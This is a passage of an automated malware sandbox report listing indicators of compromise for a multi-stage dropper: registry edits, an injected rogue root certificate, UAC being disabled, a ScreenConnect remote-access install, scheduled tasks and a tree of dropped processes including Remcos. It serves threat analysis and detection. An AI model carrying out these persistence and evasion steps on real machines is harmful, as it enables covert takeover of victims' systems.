\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-100 = "Isolated User Mode (IUM)" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-843 = "BitLocker Drive Encryption" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\wuaueng.dll,-400 = "Windows Update" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\fveui.dll,-844 = "BitLocker Data Recovery Agent" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\system32\NgcRecovery.dll,-100 = "Windows Hello Recovery Key Encryption" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27\52C64B7E\@%SystemRoot%\System32\ci.dll,-101 = "Enclave" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\26\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" ScreenConnect.ClientService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe -
Modifies registry class 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ThreadingModel = "Apartment" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\PackageCode = "84F03508698966EF2ABADC1907673931" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Language = "1033" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32 msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Assignment = "1" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AdvertiseFlags = "388" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\InstanceType = "0" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\PackageName = "setup.msi" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1045960512-3948844814-3059691613-1000\{020CC76E-28AB-4434-8B9F-D648DCEE2007} msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\sc-c13606fe9009f11d\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931\Full msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" msiexec.exe Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF} msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\84F03508698966EF2ABADC1907673931 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1\84F03508698966EF2ABADC1907673931 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Media\1 = ";" msiexec.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings RMX.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductName = "ScreenConnect Client (c13606fe9009f11d)" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Version = "402784261" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ScreenConnect\\c13606fe9009f11d\\" msiexec.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\Clients = 3a0000000000 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\shell\open\command\ = "\"C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsClient.exe\" \"%1\"" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\9B17BA2F046B25CF1C6360EF09901FD1 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ file.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\URL Protocol msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d\UseOriginalUrlEncoding = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\ = "ScreenConnect Client (c13606fe9009f11d) Credential Provider" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\sc-c13606fe9009f11d msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6FF59A85-BC37-4CD4-ACCE-587A10BE02DF}\InprocServer32\ = "C:\\Program Files (x86)\\ScreenConnect Client (c13606fe9009f11d)\\ScreenConnect.WindowsCredentialProvider.dll" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\ProductIcon = "C:\\Windows\\Installer\\{80530F48-9896-FE66-A2AB-CD9170769313}\\DefaultIcon" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\AuthorizedLUAApp = "0" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\84F03508698966EF2ABADC1907673931\DeploymentFlags = "3" msiexec.exe -
Modifies registry key 1 TTPs 2 IoCs
pid Process 5504 reg.exe 1276 reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064 newbundle2.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F1A578C4CB5DE79A370893983FD4DA8B67B2B064\Blob = 0b000000010000004800000054006900740061006e00690075006d00200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f00720069007400790000000200000001000000cc0000001c0000006c00000001000000000000000000000000000000010000007b00340031003700340034004200450034002d0031003100430035002d0034003900340043002d0041003200310033002d004200410030004300450039003400340039003300380045007d00000000004d006900630072006f0073006f0066007400200045006e00680061006e006300650064002000430072007900700074006f0067007200610070006800690063002000500072006f00760069006400650072002000760031002e00300000000000030000000100000014000000f1a578c4cb5de79a370893983fd4da8b67b2b06420000000010000000a03000030820306308201eea003020102020867f7beb96a4c2798300d06092a864886f70d01010b0500302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f72697479301e170d3233303331343130333532305a170d3236303631373130333532305a302e312c302a06035504030c23546974616e69756d20526f6f7420436572746966696361746520417574686f7269747930820122300d06092a864886f70d01010105000382010f003082010a028201010086e4577a5861ce819177d005fa51d5515a936c610ccfcbde5332cd151da647ee881a245c9b02833b02af3d76fe20bd3bfaf7a20973e72ebd9440d09d8c3d2713bdf0d09feb9532acd7a42da2a952daa86a2a88ee427d30959d90bfba05276aa02998a6986fc01306629b79b8405d1f1fa6d9a42f827afc7566340dc2de27012b94bb4a27b3cb1c219a3cb2c14203f34451bd626520edd4dbcc414f593f2acbc48479f7143cbe139cfd129c913e5303dc20f94c44358901b69a848d7ea02e308a311560ac00ae009a29109aeed9713dd8919b97ed598058e17f0726c7a020f710abc06291dfaaf181c6be6a76c89cb68eb0b0ec1cd95f326c7e55588bfd76c5190203010001a328302630130603551d25040c300a06082b06010505070301300f0603551d130101ff040530030101ff300d06092a864886f70d01010b0500038201010070851293d757e982797dc5f7f27da894ef0cdb329f06a6096e0cf604b0e54711560ef40f5282082e210f55a3db41f312548b7611f5f0dacea3c78b13f6fc243c02b106665be69e184088415b273999b877bee353a248cec7eeb5a095c2174bc9526cafe3372c59dbfbe758134ed351e5147273fec68577ae4552a6f99ac80ca8d0ee422af528858c6be81cb0a8031ab0ae83c0eb5564f4e87a5c06295d3903eee2fdf92d62a7f4d4054deaa79bcaebda4e8b1a6efd42aef9d01c7075728cb13aa8557c85a72532b5e2d6c3e55041c9867ca8f562bbd2ab0c3710d83173ec3781d1dcaac5c6e07ee726624dfdc5814cffd336e17932f89beb9cf7fdbee9bebf61 newbundle2.exe -
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 9140 schtasks.exe 4444 schtasks.exe 5420 schtasks.exe 2500 schtasks.exe 5564 schtasks.exe 4296 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 564 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 2140 yiklfON.exe 2140 yiklfON.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 3400 2020.exe 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 2180 Blsvr.exe 2180 Blsvr.exe 2180 Blsvr.exe 2180 Blsvr.exe 2180 Blsvr.exe 2180 Blsvr.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
pid Process 4328 H8hsp6zrMtJI2hC.exe 816 4363463463464363463463463.exe 5852 explorer.exe 6776 svchost.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 2732 remcos.exe 2628 pyexec.exe 5588 cmd.exe 5776 remcos.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 816 4363463463464363463463463.exe Token: SeDebugPrivilege 2140 yiklfON.exe Token: SeDebugPrivilege 3252 tester.exe Token: SeDebugPrivilege 1924 tasklist.exe Token: SeDebugPrivilege 840 tasklist.exe Token: SeDebugPrivilege 3400 2020.exe Token: SeShutdownPrivilege 5068 powercfg.exe Token: SeCreatePagefilePrivilege 5068 powercfg.exe Token: SeLockMemoryPrivilege 2372 conhost.exe Token: SeLockMemoryPrivilege 2372 conhost.exe Token: SeShutdownPrivilege 4936 powercfg.exe Token: SeCreatePagefilePrivilege 4936 powercfg.exe Token: SeShutdownPrivilege 3256 powercfg.exe Token: SeCreatePagefilePrivilege 3256 powercfg.exe Token: SeShutdownPrivilege 3128 powercfg.exe Token: SeCreatePagefilePrivilege 3128 powercfg.exe Token: SeDebugPrivilege 4376 H8hsp6zrMtJI2hC.exe Token: SeDebugPrivilege 876 powershell.exe Token: SeDebugPrivilege 4416 powershell.exe Token: SeDebugPrivilege 3852 tasklist.exe Token: SeDebugPrivilege 2804 tasklist.exe Token: SeDebugPrivilege 2008 223522870.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeIncreaseQuotaPrivilege 644 powershell.exe Token: SeSecurityPrivilege 644 powershell.exe Token: SeTakeOwnershipPrivilege 644 powershell.exe Token: SeLoadDriverPrivilege 644 powershell.exe Token: SeSystemProfilePrivilege 644 powershell.exe Token: SeSystemtimePrivilege 644 powershell.exe Token: SeProfSingleProcessPrivilege 644 powershell.exe Token: SeIncBasePriorityPrivilege 644 powershell.exe Token: SeCreatePagefilePrivilege 644 powershell.exe Token: SeBackupPrivilege 644 powershell.exe Token: SeRestorePrivilege 644 powershell.exe Token: SeShutdownPrivilege 644 powershell.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeSystemEnvironmentPrivilege 644 powershell.exe Token: SeRemoteShutdownPrivilege 644 powershell.exe Token: SeUndockPrivilege 644 powershell.exe Token: SeManageVolumePrivilege 644 powershell.exe Token: 33 644 powershell.exe Token: 34 644 powershell.exe Token: 35 644 powershell.exe Token: 36 644 powershell.exe Token: SeIncreaseQuotaPrivilege 644 powershell.exe Token: SeSecurityPrivilege 644 powershell.exe Token: SeTakeOwnershipPrivilege 644 powershell.exe Token: SeLoadDriverPrivilege 644 powershell.exe Token: SeSystemProfilePrivilege 644 powershell.exe Token: SeSystemtimePrivilege 644 powershell.exe Token: SeProfSingleProcessPrivilege 644 powershell.exe Token: SeIncBasePriorityPrivilege 644 powershell.exe Token: SeCreatePagefilePrivilege 644 powershell.exe Token: SeBackupPrivilege 644 powershell.exe Token: SeRestorePrivilege 644 powershell.exe Token: SeShutdownPrivilege 644 powershell.exe Token: SeDebugPrivilege 644 powershell.exe Token: SeSystemEnvironmentPrivilege 644 powershell.exe Token: SeRemoteShutdownPrivilege 644 powershell.exe Token: SeUndockPrivilege 644 powershell.exe Token: SeManageVolumePrivilege 644 powershell.exe Token: 33 644 powershell.exe Token: 34 644 powershell.exe Token: 35 644 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2200 Cooper.pif 2200 Cooper.pif 2200 Cooper.pif 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 944 Paraguay.pif 944 Paraguay.pif 944 Paraguay.pif 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2200 Cooper.pif 2200 Cooper.pif 2200 Cooper.pif 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe 2372 conhost.exe -
Suspicious use of SetWindowsHookEx 19 IoCs
pid Process 4328 H8hsp6zrMtJI2hC.exe 3020 iupdate.exe 312 svchost.exe 3152 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 3152 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 3152 %E8%88%9E%E8%B9%88%E5%8A%A9%E6%89%8B.exe 5988 gagagggagagag.exe 6004 injector.exe 6004 injector.exe 6064 icsys.icn.exe 6064 icsys.icn.exe 5852 explorer.exe 5852 explorer.exe 8424 spoolsv.exe 8424 spoolsv.exe 6776 svchost.exe 6776 svchost.exe 5944 spoolsv.exe 5944 spoolsv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 816 wrote to memory of 2652 816 4363463463464363463463463.exe 84 PID 816 wrote to memory of 2652 816 4363463463464363463463463.exe 84 PID 816 wrote to memory of 2652 816 4363463463464363463463463.exe 84 PID 2652 wrote to memory of 656 2652 nothjgdwa.exe 85 PID 2652 wrote to memory of 656 2652 nothjgdwa.exe 85 PID 2652 wrote to memory of 656 2652 nothjgdwa.exe 85 PID 816 wrote to memory of 2140 816 4363463463464363463463463.exe 88 PID 816 wrote to memory of 2140 816 4363463463464363463463463.exe 88 PID 816 wrote to memory of 2140 816 4363463463464363463463463.exe 88 PID 656 wrote to memory of 3252 656 Gxtuum.exe 96 PID 656 wrote to memory of 3252 656 Gxtuum.exe 96 PID 656 wrote to memory of 3252 656 Gxtuum.exe 96 PID 816 wrote to memory of 312 816 4363463463464363463463463.exe 103 PID 816 wrote to memory of 312 816 4363463463464363463463463.exe 103 PID 816 wrote to memory of 312 816 4363463463464363463463463.exe 103 PID 312 wrote to memory of 1888 312 ChatLife.exe 104 PID 312 wrote to memory of 1888 312 ChatLife.exe 104 PID 312 wrote to memory of 1888 312 ChatLife.exe 104 PID 1888 wrote to memory of 1924 1888 cmd.exe 106 PID 1888 wrote to memory of 1924 1888 cmd.exe 106 PID 1888 wrote to memory of 1924 1888 cmd.exe 106 PID 1888 wrote to memory of 3632 1888 cmd.exe 107 PID 1888 wrote to memory of 3632 1888 cmd.exe 107 PID 1888 wrote to memory of 3632 1888 cmd.exe 107 PID 1888 wrote to memory of 840 1888 cmd.exe 108 PID 1888 wrote to memory of 840 1888 cmd.exe 108 PID 1888 wrote to memory of 840 1888 cmd.exe 108 PID 1888 wrote to memory of 4696 1888 cmd.exe 109 PID 1888 wrote to memory of 4696 1888 cmd.exe 109 PID 1888 wrote to memory of 4696 1888 cmd.exe 109 PID 816 wrote to memory of 868 816 4363463463464363463463463.exe 110 PID 816 wrote to memory of 868 816 4363463463464363463463463.exe 110 PID 816 wrote to memory of 868 816 4363463463464363463463463.exe 110 PID 1888 wrote to memory of 1596 1888 cmd.exe 111 PID 1888 wrote to memory of 1596 1888 cmd.exe 111 PID 1888 wrote to memory of 1596 1888 cmd.exe 111 PID 1888 wrote to memory of 4892 1888 cmd.exe 112 PID 1888 wrote to memory of 4892 1888 cmd.exe 112 PID 1888 wrote to memory of 4892 1888 cmd.exe 112 PID 1888 wrote to memory of 4164 1888 cmd.exe 113 PID 1888 wrote to memory of 4164 1888 cmd.exe 113 PID 1888 wrote to memory of 4164 1888 cmd.exe 113 PID 1888 wrote to memory of 944 1888 cmd.exe 114 PID 1888 wrote to memory of 944 1888 cmd.exe 114 PID 1888 wrote to memory of 944 1888 cmd.exe 114 PID 1888 wrote to memory of 4608 1888 cmd.exe 115 PID 1888 wrote to memory of 4608 1888 cmd.exe 115 PID 1888 wrote to memory of 4608 1888 cmd.exe 115 PID 816 wrote to memory of 2912 816 4363463463464363463463463.exe 116 PID 816 wrote to memory of 2912 816 4363463463464363463463463.exe 116 PID 816 wrote to memory of 2912 816 4363463463464363463463463.exe 116 PID 944 wrote to memory of 1188 944 Paraguay.pif 117 PID 944 wrote to memory of 1188 944 Paraguay.pif 117 PID 944 wrote to memory of 1188 944 Paraguay.pif 117 PID 2140 wrote to memory of 3972 2140 yiklfON.exe 123 PID 2140 wrote to memory of 3972 2140 yiklfON.exe 123 PID 2140 wrote to memory of 3972 2140 yiklfON.exe 123 PID 2140 wrote to memory of 708 2140 yiklfON.exe 124 PID 2140 wrote to memory of 708 2140 yiklfON.exe 124 PID 2140 wrote to memory of 708 2140 yiklfON.exe 124 PID 2140 wrote to memory of 708 2140 yiklfON.exe 124 PID 2140 wrote to memory of 708 2140 yiklfON.exe 124 PID 2140 wrote to memory of 708 2140 yiklfON.exe 124 PID 2140 wrote to memory of 708 2140 yiklfON.exe 124 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" wefhrf.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 5140 attrib.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3464
-
C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe"2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:816 -
C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe"C:\Users\Admin\AppData\Local\Temp\Files\nothjgdwa.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2652 -
C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a121af5f66\Gxtuum.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:656 -
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:3252 -
C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"C:\Users\Admin\AppData\Local\Temp\10000810101\tester.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4220
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"C:\Users\Admin\AppData\Local\Temp\Files\yiklfON.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2140 -
